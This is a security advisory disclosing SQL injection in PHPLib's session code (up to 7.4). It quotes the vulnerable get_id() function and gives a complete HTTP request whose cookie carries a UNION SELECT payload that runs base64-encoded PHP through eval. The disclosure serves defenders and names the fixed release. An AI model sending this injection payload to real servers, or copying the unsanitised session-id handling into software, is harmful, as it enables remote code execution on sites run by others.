77 lines
No EOL
3.2 KiB
Text
77 lines
No EOL
3.2 KiB
Text
PHPLib SQL Injection
|
|
|
|
Vendor: PHPLib
|
|
Product: PHPLib
|
|
Version: <= 7.4
|
|
Website: http://phplib.sourceforge.net/
|
|
|
|
BID: 16801
|
|
CVE: CVE-2006-0887 CVE-2006-2826
|
|
OSVDB: 23466
|
|
SECUNIA: 16902
|
|
|
|
Description:
|
|
The PHP Base Library aka PHPLib is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL Injection issues that in a worst case scenario can lead to remote code execution by using UNION and selecting arbitrary php code into an eval call. A new version og PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible.
|
|
|
|
|
|
Remote Code Execution:
|
|
There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution.
|
|
## Propagate the session id according to mode and lifetime.
|
|
## Will create a new id if necessary. To take over abandoned sessions,
|
|
## one may provide the new session id as a parameter (not recommended).
|
|
|
|
function get_id($id = "") {
|
|
global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
|
|
$this->newid=true;
|
|
|
|
$this->name = $this->cookiename==""?$this->classname:$this->cookiename;
|
|
|
|
if ( "" == $id ) {
|
|
$this->newid=false;
|
|
switch ($this->mode) {
|
|
case "get":
|
|
$id = isset($HTTP_GET_VARS[$this->name]) ?
|
|
$HTTP_GET_VARS[$this->name] :
|
|
( isset($HTTP_POST_VARS[$this->name]) ?
|
|
$HTTP_POST_VARS[$this->name] :
|
|
"") ;
|
|
break;
|
|
case "cookie":
|
|
$id = isset($HTTP_COOKIE_VARS[$this->name]) ?
|
|
$HTTP_COOKIE_VARS[$this->name] : "";
|
|
break;
|
|
default:
|
|
die("This has not been coded yet.");
|
|
break;
|
|
}
|
|
}
|
|
|
|
### do not accept user provided ids for creation
|
|
if($id != "" && $this->block_alien_sid) { # somehow an id was provided by the user
|
|
if($this->that->ac_get_value($id, $this->name) == "") {
|
|
# no - the id doesn't exist in the database: Ignore it!
|
|
$id = "";
|
|
}
|
|
}
|
|
|
|
The above code is from sessions.inc @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call.
|
|
GET /phplib/pages/index.php3 HTTP/1.1
|
|
Host: example.net
|
|
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
|
|
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Keep-Alive: 300
|
|
Connection: keep-alive
|
|
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
|
|
If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT
|
|
For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call.
|
|
|
|
|
|
Solution:
|
|
PHPLib 7.4a has been released to address these issues.
|
|
|
|
|
|
Credits:
|
|
James Bercegay of the GulfTech Security Research Team |